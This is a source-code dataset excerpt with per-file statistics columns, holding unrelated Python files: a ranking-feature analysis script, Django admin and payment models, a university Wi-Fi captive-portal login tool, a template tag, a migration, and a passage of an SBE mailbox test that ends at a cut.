| 22.606061 | 66 | 0.430295 | 64 | 746 | 5 | 0.484375 | 0.0875 | 0.1375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011682 | 0.426273 | 746 | 32 | 67 | 23.3125 | 0.735981 | 0.02815 | 0 | 0.380952 | 0 | 0 | 0.097826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82ecef2ff3628afa85b6185c93f911d25a8014e1 | 5,635 | py | Python | src/main/python/Training+Data+Analysis.py | sully90/dp-search-service | efc6a94dad1c5b3fc898da9ced1606aa345c7ecd | [
"MIT"
] | null | null | null | src/main/python/Training+Data+Analysis.py | sully90/dp-search-service | efc6a94dad1c5b3fc898da9ced1606aa345c7ecd | [
"MIT"
] | null | null | null | src/main/python/Training+Data+Analysis.py | sully90/dp-search-service | efc6a94dad1c5b3fc898da9ced1606aa345c7ecd | [
"MIT"
] | null | null | null |
# coding: utf-8
# # Training Set Analysis
# The purpose of this notebook is to compute the kernel density estimate of the PDF between the judgement and each feature in a training set, in order to estimate how each feature is performing.
#
# # TODO
# Modify features to use custom function score queries, and use ML to optimise features given the below plot (plot ideal relationship between judgement and features, and optimise to get as close as possible).
# In[51]:
import sys
import numpy as np
import scipy
from scipy import stats
import matplotlib.pylab as plt
models_dir = "/Users/sullid/ONS/dp-search-service/src/main/resources/elastic.ltr/models"
model_name = sys.argv[1]
# In[52]:
class TrainingData(object):
"""
Class to handle the loading of training sets
"""
def __init__(self, model_dir, model_name):
self.model_dir = model_dir
self.model_name = model_name
self.data = {}
self.load()
def load(self):
fname = "%s/%s/ons_train.txt" % (self.model_dir, self.model_name)
with open(fname, 'r') as f:
lines = f.readlines()
qid_dict = {}
# First collect the qids
for line in lines:
parts = line.split("\t")
qid_part = parts[1]
qid = int(qid_part.split(":")[1])
if (qid not in qid_dict):
qid_dict[qid] = []
qid_dict[qid].append(line)
# Process each line by the qid
for qid in qid_dict.keys():
lines = qid_dict[qid]
self.data[qid] = {}
for line in lines:
if (line.startswith("#")):
continue
parts = line.split("\t")
if (len(parts) > 0):
for part in parts:
if ('#' in part):
part = part[0:part.index("#")].strip()
key = "J"
val = 0.0
if (":" in part):
key = part.split(":")[0]
val = float(part.split(":")[-1])
else:
val = float(part)
if (key not in self.data[qid]):
self.data[qid][key] = []
self.data[qid][key].append(val)
def get(self, qid, item):
return np.array(self.data[qid][item])
def qids(self):
return self.data.keys()
def keys(self, qid):
return self.data[qid].keys()
def min(self, qid, item):
return min(self.get(qid, item))
    def max(self, qid, item):
        return max(self.get(qid, item))
def size(self, qid):
return len(self.get(qid, "J"))
def numFeatures(self, qid):
return len(self.keys(qid)) - 2 # - 2 to account for judgement (J) and qid
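# Illustrative sketch (hypothetical values): load() expects tab-separated,
# LETOR-style lines such as "3\tqid:1\t1:0.53\t2:0.12 # doc-id", where the leading
# judgement is stored under the "J" key and each "n:value" pair under key "n".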
trainingData = TrainingData(models_dir, model_name)
# In[56]:
import matplotlib.gridspec as gridspec
import matplotlib.pylab as pylab
fs=25
params = {'legend.fontsize': 'x-large',
'figure.figsize': (15, 5),
'axes.labelsize': fs,
'axes.titlesize':fs,
'xtick.labelsize':fs,
'ytick.labelsize':fs}
pylab.rcParams.update(params)
def getValues(trainingData, qid, i):
if (i == 0):
return "Judgement", trainingData.get(qid, "J")
# elif (i == 1 or i == 9):
# return str(i), np.log10(trainingData[str(i)])
else:
return "Feature %d" % i, trainingData.get(qid, str(i))
def fitKernel(x,y,n=100j):
xmin,xmax,ymin,ymax=(x.min(),x.max(),y.min(),y.max())
X, Y = np.mgrid[xmin:xmax:n, ymin:ymax:n]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([x, y])
kernel = stats.gaussian_kde(values)
Z = np.reshape(kernel(positions).T, X.shape)
return np.rot90(Z), (xmin, xmax, ymin, ymax)
def forceAspect(ax,aspect=1):
im = ax.get_images()
extent = im[0].get_extent()
ax.set_aspect(abs((extent[1]-extent[0])/(extent[3]-extent[2]))/aspect)
print "QIDS: ", trainingData.qids()
for qid in trainingData.qids():
numFeatures = trainingData.numFeatures(qid) + 1
fig = plt.figure(figsize=(50, 50))
plt.suptitle('qid:%d' % qid, fontsize=fs*1.5)
gs = gridspec.GridSpec(numFeatures, numFeatures)
for i in range(numFeatures):
rowLabel, rowValues = getValues(trainingData, qid, i)
labelRow = True
for j in range(i+1, numFeatures):
colLabel, colValues = getValues(trainingData, qid, j)
ax = plt.subplot(gs[i,j-numFeatures])
# ax.text(0.25, 0.5, "ax %d:%d" % (i,j))
if (labelRow):
ax.set_ylabel(rowLabel)
labelRow = False
if (j == (i+1)):
ax.set_xlabel(colLabel)
try:
Z, (xmin,xmax,ymin,ymax) = fitKernel(colValues, rowValues, 200j)
extent = [xmin,xmax,ymin,ymax]
ax.imshow(Z, cmap=plt.cm.gist_stern_r, extent=extent)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
forceAspect(ax)
except:
pass
# ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r,
# extent=[xmin, xmax, ymin, ymax], aspect=50)
# ax.plot(x, y, 'k.', markersize=2)
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([ymin, ymax])
plt.show()
| 31.836158 | 208 | 0.525998 | 713 | 5,635 | 4.102384 | 0.31136 | 0.02188 | 0.022564 | 0.02735 | 0.099145 | 0.023248 | 0.023248 | 0.023248 | 0.023248 | 0.023248 | 0 | 0.01646 | 0.342325 | 5,635 | 176 | 209 | 32.017045 | 0.772801 | 0.155989 | 0 | 0.052174 | 0 | 0.008696 | 0.049668 | 0.015628 | 0 | 0 | 0 | 0.005682 | 0 | 0 | null | null | 0.008696 | 0.06087 | null | null | 0.008696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82efe2ac2a9247e0f62ea4de8994ddbcc198a68c | 368 | py | Python | manage_it/catalog/admin.py | ShangShungInstitute/django-manage-it | 13cb23b57ce3577db7f69250741bcbfe82b69a57 | [
"MIT",
"Unlicense"
] | 1 | 2015-01-20T14:34:32.000Z | 2015-01-20T14:34:32.000Z | manage_it/catalog/admin.py | ShangShungInstitute/django-manage-it | 13cb23b57ce3577db7f69250741bcbfe82b69a57 | [
"MIT",
"Unlicense"
] | null | null | null | manage_it/catalog/admin.py | ShangShungInstitute/django-manage-it | 13cb23b57ce3577db7f69250741bcbfe82b69a57 | [
"MIT",
"Unlicense"
] | null | null | null | from django.contrib import admin
from models import Location, ItemTemplate, Log, Inventory, Supplier
class ItemTemplateAdmin(admin.ModelAdmin):
filter_horizontal = ('supplies', 'suppliers')
admin.site.register(Location)
admin.site.register(ItemTemplate, ItemTemplateAdmin)
admin.site.register(Log)
admin.site.register(Inventory)
admin.site.register(Supplier)
| 24.533333 | 67 | 0.807065 | 42 | 368 | 7.047619 | 0.47619 | 0.152027 | 0.287162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089674 | 368 | 14 | 68 | 26.285714 | 0.883582 | 0 | 0 | 0 | 0 | 0 | 0.046322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82f2ce225147eef11b48a4a976040f87c859485c | 7,566 | py | Python | orchestra/contrib/payments/models.py | udm88/django-orchestra | 49c84f13a8f92427b01231615136549fb5be3a78 | [
"Unlicense"
] | 68 | 2015-02-09T10:28:44.000Z | 2022-03-12T11:08:36.000Z | orchestra/contrib/payments/models.py | ferminhg/django-orchestra | 49c84f13a8f92427b01231615136549fb5be3a78 | [
"Unlicense"
] | 17 | 2015-05-01T18:10:03.000Z | 2021-03-19T21:52:55.000Z | orchestra/contrib/payments/models.py | ferminhg/django-orchestra | 49c84f13a8f92427b01231615136549fb5be3a78 | [
"Unlicense"
] | 29 | 2015-03-31T04:51:03.000Z | 2022-02-17T02:58:50.000Z | from django.core.exceptions import ValidationError
from django.db import models
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from jsonfield import JSONField
from orchestra.models.fields import PrivateFileField
from orchestra.models.queryset import group_by
from . import settings
from .methods import PaymentMethod
class PaymentSourcesQueryset(models.QuerySet):
def get_default(self):
return self.filter(is_active=True).first()
class PaymentSource(models.Model):
account = models.ForeignKey('accounts.Account', verbose_name=_("account"),
related_name='paymentsources')
method = models.CharField(_("method"), max_length=32,
choices=PaymentMethod.get_choices())
data = JSONField(_("data"), default={})
is_active = models.BooleanField(_("active"), default=True)
objects = PaymentSourcesQueryset.as_manager()
def __str__(self):
return "%s (%s)" % (self.label, self.method_class.verbose_name)
@cached_property
def method_class(self):
return PaymentMethod.get(self.method)
@cached_property
def method_instance(self):
""" Per request lived method_instance """
return self.method_class(self)
@cached_property
def label(self):
return self.method_instance.get_label()
@cached_property
def number(self):
return self.method_instance.get_number()
def get_bill_context(self):
method = self.method_instance
return {
'message': method.get_bill_message(),
}
def get_due_delta(self):
return self.method_instance.due_delta
def clean(self):
self.data = self.method_instance.clean_data()
class TransactionQuerySet(models.QuerySet):
group_by = group_by
def create(self, **kwargs):
source = kwargs.get('source')
if source is None or not hasattr(source.method_class, 'process'):
# Manual payments don't need processing
kwargs['state'] = self.model.WAITTING_EXECUTION
amount = kwargs.get('amount')
if amount == 0:
kwargs['state'] = self.model.SECURED
return super(TransactionQuerySet, self).create(**kwargs)
def secured(self):
return self.filter(state=Transaction.SECURED)
def exclude_rejected(self):
return self.exclude(state=Transaction.REJECTED)
def amount(self):
return next(iter(self.aggregate(models.Sum('amount')).values())) or 0
def processing(self):
return self.filter(state__in=[Transaction.EXECUTED, Transaction.WAITTING_EXECUTION])
class Transaction(models.Model):
WAITTING_PROCESSING = 'WAITTING_PROCESSING' # CREATED
WAITTING_EXECUTION = 'WAITTING_EXECUTION' # PROCESSED
EXECUTED = 'EXECUTED'
SECURED = 'SECURED'
REJECTED = 'REJECTED'
STATES = (
(WAITTING_PROCESSING, _("Waitting processing")),
(WAITTING_EXECUTION, _("Waitting execution")),
(EXECUTED, _("Executed")),
(SECURED, _("Secured")),
(REJECTED, _("Rejected")),
)
STATE_HELP = {
WAITTING_PROCESSING: _("The transaction is created and requires processing by the "
"specific payment method."),
WAITTING_EXECUTION: _("The transaction is processed and its pending execution on "
"the related financial institution."),
EXECUTED: _("The transaction is executed on the financial institution."),
SECURED: _("The transaction ammount is secured."),
REJECTED: _("The transaction has failed and the ammount is lost, a new transaction "
"should be created for recharging."),
}
bill = models.ForeignKey('bills.bill', verbose_name=_("bill"),
related_name='transactions')
source = models.ForeignKey(PaymentSource, null=True, blank=True, on_delete=models.SET_NULL,
verbose_name=_("source"), related_name='transactions')
process = models.ForeignKey('payments.TransactionProcess', null=True, blank=True,
on_delete=models.SET_NULL, verbose_name=_("process"), related_name='transactions')
state = models.CharField(_("state"), max_length=32, choices=STATES,
default=WAITTING_PROCESSING)
amount = models.DecimalField(_("amount"), max_digits=12, decimal_places=2)
currency = models.CharField(max_length=10, default=settings.PAYMENT_CURRENCY)
created_at = models.DateTimeField(_("created"), auto_now_add=True)
modified_at = models.DateTimeField(_("modified"), auto_now=True)
objects = TransactionQuerySet.as_manager()
def __str__(self):
return "#%i" % self.id
@property
def account(self):
return self.bill.account
def clean(self):
if not self.pk:
amount = self.bill.transactions.exclude(state=self.REJECTED).amount()
if amount >= self.bill.total:
raise ValidationError(
_("Bill %(number)s already has valid transactions that cover bill total amount (%(amount)s).") % {
'number': self.bill.number,
'amount': amount,
}
)
def get_state_help(self):
if self.source:
return self.source.method_instance.state_help.get(self.state) or self.STATE_HELP.get(self.state)
return self.STATE_HELP.get(self.state)
def mark_as_processed(self):
self.state = self.WAITTING_EXECUTION
self.save(update_fields=('state', 'modified_at'))
def mark_as_executed(self):
self.state = self.EXECUTED
self.save(update_fields=('state', 'modified_at'))
def mark_as_secured(self):
self.state = self.SECURED
self.save(update_fields=('state', 'modified_at'))
def mark_as_rejected(self):
self.state = self.REJECTED
self.save(update_fields=('state', 'modified_at'))
class TransactionProcess(models.Model):
"""
Stores arbitrary data generated by payment methods while processing transactions
"""
CREATED = 'CREATED'
EXECUTED = 'EXECUTED'
ABORTED = 'ABORTED'
COMMITED = 'COMMITED'
STATES = (
(CREATED, _("Created")),
(EXECUTED, _("Executed")),
(ABORTED, _("Aborted")),
(COMMITED, _("Commited")),
)
data = JSONField(_("data"), blank=True)
file = PrivateFileField(_("file"), blank=True)
state = models.CharField(_("state"), max_length=16, choices=STATES, default=CREATED)
created_at = models.DateTimeField(_("created"), auto_now_add=True, db_index=True)
updated_at = models.DateTimeField(_("updated"), auto_now=True)
class Meta:
verbose_name_plural = _("Transaction processes")
def __str__(self):
return '#%i' % self.id
def mark_as_executed(self):
self.state = self.EXECUTED
for transaction in self.transactions.all():
transaction.mark_as_executed()
self.save(update_fields=('state', 'updated_at'))
def abort(self):
self.state = self.ABORTED
for transaction in self.transactions.all():
transaction.mark_as_rejected()
self.save(update_fields=('state', 'updated_at'))
def commit(self):
self.state = self.COMMITED
for transaction in self.transactions.processing():
transaction.mark_as_secured()
self.save(update_fields=('state', 'updated_at'))
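# Illustrative lifecycle sketch (hypothetical usage, not part of the original module):
#   process = TransactionProcess.objects.create()
#   process.mark_as_executed()   # related transactions move to EXECUTED
#   process.commit()             # processing transactions are marked SECURED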
| 35.85782 | 118 | 0.648163 | 824 | 7,566 | 5.75 | 0.214806 | 0.027438 | 0.023639 | 0.025116 | 0.272478 | 0.244829 | 0.172225 | 0.147953 | 0.107007 | 0.048544 | 0 | 0.002257 | 0.238699 | 7,566 | 210 | 119 | 36.028571 | 0.820313 | 0.022733 | 0 | 0.171779 | 0 | 0 | 0.139891 | 0.003664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159509 | false | 0 | 0.055215 | 0.079755 | 0.558282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
82f8c42e4b7f145f7c76d62522e5c2d2fdd59996 | 8,992 | py | Python | puwifi.py | SaicharanKandukuri/logmein | 9946488fb61093bf2394254da056d2ebd290e83a | [
"MIT"
] | 4 | 2021-12-01T12:07:49.000Z | 2022-03-16T15:11:57.000Z | puwifi.py | SaicharanKandukuri/puwifi | 9946488fb61093bf2394254da056d2ebd290e83a | [
"MIT"
] | 10 | 2021-12-01T11:41:04.000Z | 2022-03-16T16:12:36.000Z | puwifi.py | SaicharanKandukuri/logmein | 9946488fb61093bf2394254da056d2ebd290e83a | [
"MIT"
] | 2 | 2021-11-29T16:16:22.000Z | 2021-11-30T05:06:05.000Z | import optparse
import sys
from sys import getsizeof
import logging
from signal import signal, SIGINT
import time
import requests
# MIT License
#
# Copyright (c) 2022 SaicharanKandukuri
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from rich.logging import RichHandler
FORMAT = "%(message)s"
logging.basicConfig(
level="NOTSET",
format=FORMAT,
datefmt="[%X]",
handlers=[RichHandler()]
)
logging.disable('DEBUG')
log = logging.getLogger("rich")
class WifiUtils:
"""class for wifi utils"""
def __init__(self, username, password, host, port):
self.username = username
self.password = password
self.host = host
self.port = port
@classmethod
def request(cls,
method,
username,
password,
host, port,
timeout) -> list:
"""request method: sends request to wifi host
Args:
method (str): interaction method "login.xml" or "logout.xml". Defaults to "login.xml".
username (str): username assigned by parul university to access wifi
password (str): password assigned by parul university to access wifi
            host (str): hostname of the parul university wifi hotspot/routers. Defaults to "10.0.0.11".
port (str): port to send login request. Defaults to "8090".
timeout (int): request timeout. Defaults to 10.
Returns:
list
server_request status[true|false]
response(xml data returned form server)
status_code(web request status code)
"""
url = ("http://"+host+":"+port+"/"+method)
body = ("mode=191&username=" + username + "&password=" + password +
"&a=1630404423764&producttype=0"
)
headers = {
"Host": "http://" + host + ":" + port + "",
"Content-Length": str(getsizeof(body)),
"User-Agent": "Chrome/92.0.4515.159 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "*/*",
"Origin": "http://" + host + ":" + port,
"Referer": "http://" + host + ":" + port + "/",
"Accept-Encoding": "gzip defalte",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close",
}
body_array = bytearray(body, 'utf-8')
req = requests.post(url,
data=body_array,
headers=headers,
timeout=timeout,
verify=False
)
return [(req.status_code == 200), req.text, req.status_code]
def login(self,
username,
password,
host,
port="8090",
method="login.xml",
timeout=10) -> list:
"""login: uses request method to send login web request with credentials to wifi host
Args:
username (str): username assigned by parul university to access wifi
password (str): password assigned by parul university to access wifi
host (str): hostname of the parul university wifi hotspot/routers
Defaults to "10.0.0.11"
port (str, optional): port to send login request. Defaults to "8090".
method (str, optional): interaction method
"login.xml" or "logout.xml". Defaults to "login.xml".
timeout (int, optional): request timeout. Defaults to 10.
"""
return self.request(method, username, password, host, port, timeout)
def logout(self,
username,
password,
host,
port="8090",
method="logout.xml",
timeout=10) -> list:
"""logout: uses request method to send logout web request with credentials to wifi host
Args:
username (str): username assigned by parul university to access wifi
password (str): password assigned by parul university to access wifi
host (str): hostname of the parul university wifi hotspot/routers
Defaults to "10.0.0.11"
port (str, optional): port to send login request. Defaults to "8090".
method (str, optional): interaction method
"login.xml" or "logout.xml". Defaults to "logout.xml".
timeout (int, optional): request timeout. Defaults to 10.
"""
return self.request(method, username, password, host, port, timeout)
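# Illustrative usage sketch (credentials and host below are placeholders):
#   wifi = WifiUtils("2203xxxx", "secret", "10.0.0.11", "8090")
#   ok, response_xml, status_code = wifi.login("2203xxxx", "secret", "10.0.0.11")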
# def get_xml_msg(xml): # for later (●'◡'●)
# return Et.parse(xml).getroot()[1]
def grey_print(_string):
"""prints outs grey text
Args:
_string (str)
"""
print(f"\033[90m{_string}\033[0m")
def connection_to(url, timeout=10):
"""checks if connection to url is available"""
try:
requests.get(url, timeout=timeout)
return True
except (requests.ConnectionError,
requests.Timeout):
return False
def keep_alive(username, password, host, port):
"""keeps connection alive to wifi host"""
while True:
if connection_to("http://10.0.0.11:8090/"):
log.info("connection to router \"available\"")
else:
log.critical("connection to router \"unavailable\"")
if connection_to("https://google.com"):
log.info("Connected to the internet")
else:
log.warning("Not connected to the internet")
log.info("Tying to login back")
try:
log.info(WifiUtils.login(username, password, host, port))
except (requests.ConnectionError,
requests.Timeout):
log.critical(
"Connection error: \"UNSTABLE CONNECTION TO HOST\"")
time.sleep(5)
def exit_handler(_signal, frame):
"""captures keyboard interrupts and kill signals & exits with messesage"""
log.warning('SIGINT or CTRL-C detected. Exiting gracefully')
grey_print("signal:"+str(_signal))
grey_print("frame:"+str(frame))
sys.exit(0)
if __name__ == '__main__':
signal(SIGINT, exit_handler)
parser = optparse.OptionParser()
parser.add_option('-u', '--username', dest='username',
help='username to login/logout with parul university wifi service')
parser.add_option('-p', '--password', dest='password',
help='password to login/logout with parul university wifi service')
parser.add_option('-H', '--host', dest='host',
default='10.0.0.11', type=str)
parser.add_option('-P', '--port', dest='port',
default='8090', type=str)
parser.add_option('-k', '--keep-alive', action='store_true',
help='keep connecting to wifi when it gets signed out', default=False)
parser.add_option('-o', '--logout', action='store_true',
help='logout from wifi', default=False)
parser.add_option('-l', '--login', action='store_true',
help='login to wifi', default=False)
options, args = parser.parse_args()
WifiUtils = WifiUtils(
options.username, options.password, options.host, options.port)
if options.login:
log.info("=> login <=")
log.info(WifiUtils.login(options.username,
options.password,
options.host, options.port,
))
sys.exit(0)
if options.logout:
log.info("=> logout <=")
log.info(WifiUtils.logout(options.username,
options.password,
options.host, options.port,
))
sys.exit(0)
if options.keep_alive:
log.info("=> keep alive <=")
keep_alive(options.username,
options.password,
options.host, options.port,
)
| 36.702041 | 98 | 0.585187 | 1,026 | 8,992 | 5.08577 | 0.292398 | 0.018398 | 0.030663 | 0.036796 | 0.364699 | 0.309889 | 0.302798 | 0.288233 | 0.261403 | 0.261403 | 0 | 0.019197 | 0.304827 | 8,992 | 244 | 99 | 36.852459 | 0.81507 | 0.349867 | 0 | 0.232394 | 0 | 0 | 0.18048 | 0.015812 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056338 | false | 0.112676 | 0.056338 | 0 | 0.15493 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
82fd258b0956b6fcb923493f7bbd91bb6546c5c0 | 335 | py | Python | bugex_online/bugex_webapp/templatetags/custom_tags.py | fkleon/bugex-online | bf0687ff6167d66980eb44adcdb14e8fc65d9504 | [
"Apache-2.0"
] | null | null | null | bugex_online/bugex_webapp/templatetags/custom_tags.py | fkleon/bugex-online | bf0687ff6167d66980eb44adcdb14e8fc65d9504 | [
"Apache-2.0"
] | 7 | 2020-06-30T23:15:12.000Z | 2022-02-01T00:57:38.000Z | bugex_online/bugex_webapp/templatetags/custom_tags.py | fkleon/bugex-online | bf0687ff6167d66980eb44adcdb14e8fc65d9504 | [
"Apache-2.0"
] | null | null | null | from django import template
from django.conf import settings
register = template.Library()
@register.simple_tag
def settings_value(name):
"""
This Tag allows to access values from the configuration file in the templates.
"""
try:
return settings.__getattr__(name)
except AttributeError:
return ""
| 22.333333 | 82 | 0.707463 | 40 | 335 | 5.775 | 0.7 | 0.08658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220896 | 335 | 14 | 83 | 23.928571 | 0.885057 | 0.232836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
82ff896e3d6c189f07e2be0a44d052ed10938137 | 330 | py | Python | producto/migrations/0004_auto_20180611_2350.py | JohanVasquez/crud-venta-libre | 557f82b5d88c42480020a65cc6034348ff20efce | [
"MIT"
] | null | null | null | producto/migrations/0004_auto_20180611_2350.py | JohanVasquez/crud-venta-libre | 557f82b5d88c42480020a65cc6034348ff20efce | [
"MIT"
] | null | null | null | producto/migrations/0004_auto_20180611_2350.py | JohanVasquez/crud-venta-libre | 557f82b5d88c42480020a65cc6034348ff20efce | [
"MIT"
] | null | null | null | # Generated by Django 2.0.6 on 2018-06-11 23:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('producto', '0003_auto_20180611_2248'),
]
operations = [
migrations.RenameModel(
old_name='Venta',
new_name='Ventas',
),
]
| 18.333333 | 48 | 0.593939 | 36 | 330 | 5.305556 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133047 | 0.293939 | 330 | 17 | 49 | 19.411765 | 0.686695 | 0.136364 | 0 | 0 | 1 | 0 | 0.14841 | 0.081272 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20192a90dd1bce99c4dd2075229189ba55979b5 | 6,481 | py | Python | src/test/testcases/testPSUReadSbeMem.py | open-power/sbe | 0208243c5bbd68fa36464397fa46a2940c827edf | [
"Apache-2.0"
] | 9 | 2017-03-21T08:34:24.000Z | 2022-01-25T06:00:51.000Z | src/test/testcases/testPSUReadSbeMem.py | sumant8098/sbe | 0208243c5bbd68fa36464397fa46a2940c827edf | [
"Apache-2.0"
] | 17 | 2016-11-04T00:46:43.000Z | 2021-04-13T16:31:11.000Z | src/test/testcases/testPSUReadSbeMem.py | sumant8098/sbe | 0208243c5bbd68fa36464397fa46a2940c827edf | [
"Apache-2.0"
] | 17 | 2017-03-24T11:52:56.000Z | 2022-01-25T06:00:49.000Z | # IBM_PROLOG_BEGIN_TAG
# This is an automatically generated prolog.
#
# $Source: src/test/testcases/testPSUReadSbeMem.py $
#
# OpenPOWER sbe Project
#
# Contributors Listed Below - COPYRIGHT 2017,2019
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# IBM_PROLOG_END_TAG
from __future__ import print_function
import sys
sys.path.append("targets/p9_nimbus/sbeTest" )
sys.path.append("targets/p9_axone/sbeTest" )
import testPSUUtil
import testRegistry as reg
import testUtil
import testMemUtil
#-------------------------------
# This is a Test Expected Data
#-------------------------------
def getdoubleword(dataInInt):
hex_string = '0'*(16-len(str(hex(dataInInt))[:18][2:])) + str(hex(dataInInt))[:18][2:]
return hex_string
def readSeeprom(offset, size, destAddr, primStatus, secStatus):
'''
#------------------------------------------------------------------------------------------------------------------------------
# SBE side test data -
#------------------------------------------------------------------------------------------------------------------------------
'''
sbe_test_data = (
#-----------------------------------------------------------------------------------------------------
# OP Reg ValueToWrite size Test Expected Data Description
#-----------------------------------------------------------------------------------------------------
# FFDC Size, Pass CMD Size
["write", reg.REG_MBOX0, "0000010000F0D703", 8, "None", "Writing to MBOX0 address"],
# seeprom offset, Size
["write", reg.REG_MBOX1, getdoubleword((offset<<32)+size), 8, "None", "Writing to MBOX1 address"],
# response Addr
["write", reg.REG_MBOX2, getdoubleword(destAddr), 8, "None", "Writing to MBOX2 address"],
["write", reg.PSU_SBE_DOORBELL_REG_WO_OR, "8000000000000000", 8, "None", "Update SBE Doorbell register to interrupt SBE"],
)
'''
#---------------------
# Host side test data - SUCCESS
#---------------------
'''
host_test_data_success = (
#----------------------------------------------------------------------------------------------------------------
# OP Reg ValueToWrite size Test Expected Data Description
#----------------------------------------------------------------------------------------------------------------
["read", reg.REG_MBOX4, "0", 8, getdoubleword((primStatus<<48)+(secStatus<<32)+0xF0D703), "Reading Host MBOX4 data to Validate"],
)
'''
#-----------------------------------------------------------------------
# Do not modify - Used to simulate interrupt on Ringing Doorbell on Host
#-----------------------------------------------------------------------
'''
host_polling_data = (
#----------------------------------------------------------------------------------------------------------------
# OP Reg ValueToWrite size Test Expected Data Description
#----------------------------------------------------------------------------------------------------------------
["read", reg.PSU_HOST_DOORBELL_REG_WO_OR, "0", 8, "8000000000000000", "Reading Host Doorbell for Interrupt Bit0"],
)
# Run Simics initially
testUtil.runCycles( 10000000 );
# Intialize the class obj instances
regObj = testPSUUtil.registry() # Registry obj def for operation
# HOST->SBE data set execution
regObj.ExecuteTestOp( testPSUUtil.simSbeObj, sbe_test_data )
print("\n Poll on Host side for INTR ...\n")
#Poll on HOST DoorBell Register for interrupt
regObj.pollingOn( testPSUUtil.simSbeObj, host_polling_data, 5 )
#SBE->HOST data set execution
regObj.ExecuteTestOp( testPSUUtil.simSbeObj, host_test_data_success )
#-------------------------
# Main Function
#-------------------------
def main():
# Run Simics initially
testUtil.runCycles( 10000000 );
print("\n Execute SBE Test - Read SBE Mem\n")
